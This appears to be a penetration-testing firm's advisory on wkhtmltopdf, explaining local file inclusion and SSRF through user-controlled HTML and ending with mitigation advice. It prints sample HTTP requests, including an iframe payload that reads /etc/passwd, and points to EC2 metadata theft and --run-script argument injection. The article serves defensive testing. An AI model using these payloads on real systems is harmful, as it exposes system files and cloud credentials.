Application Penetration Testing

wkhtmltopdf File Inclusion Vulnerability

our services


wkhtmltopdf is a widely used open source pdf and image rendering utility. When used improperly, this utility can introduce high risk security vulnerbilities. Because wkhtmltopdf renders HTML content on the server-side, it is a high risk target for both Server-side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerabilities. If a malicious user can control HTML content which is rendered by the utility, they may be able to include local and remote files in the content.

Exploiting wkhtmltopdf

Local File Inclusion

It’s fairly common to encounter API endpoints used to create pdf documents. Below shows an example of an insecure endpoint which generates pdfs from user-provided html.

POST /api/v1/pdf_report HTTP/1.1
{“data”:”<div><p>Report Heading</p>[..]}

POST /api/v1/pdf_report HTTP/1.1
{“data”:”<div><p>Report Heading</p><iframe src=”file:///etc/passwd” height=”500” width=”500”>[..]}

In many situations this will embed the system password file within our generated report.

Server-side Request Forgery (SSRF)

Penetration testers should also determine if remote files can be reached. A pentester should attempt to reach a server of which they control to determine if an inbound connection is made, and if that connection reveals an additional target host.

POST /api/v1/pdf_report HTTP/1.1
{“data”:”<div><p>Report Heading</p><img src=””>[..]}

Elevated Risk in Cloud Environments

In a number of penetration tests this vulnerability has given us elevated access beyond the application and into cloud environments. As detailed in our AWS pentesting topics, the renderer can be pointed to EC2 metadata URLs to obtain sensitive information:

POST /api/v1/pdf_report HTTP/1.1
{“data”:”<div><p>Report Heading</p><iframe src=”” height=”500” width=”500”>[..]}

The address is local to all AWS EC2 instances and applications should ensure that wkhtmltopdf cannot embed the response of this URL in documents.


Applications that generate PDFs of images with wkhtmltopdf should only accept textual data from users. Input should be encoded in the same fashion used to prevent Cross-site Scripting vulnerabilities.

In configurations where input is also passed to command line arguments such as --header-left='[webpage]', caution should be taken to ensure that other command line arguments such as --run-script <js> cannot be injected.

Further Reading

  • Application
  • Network
  • Mobile
  • AWS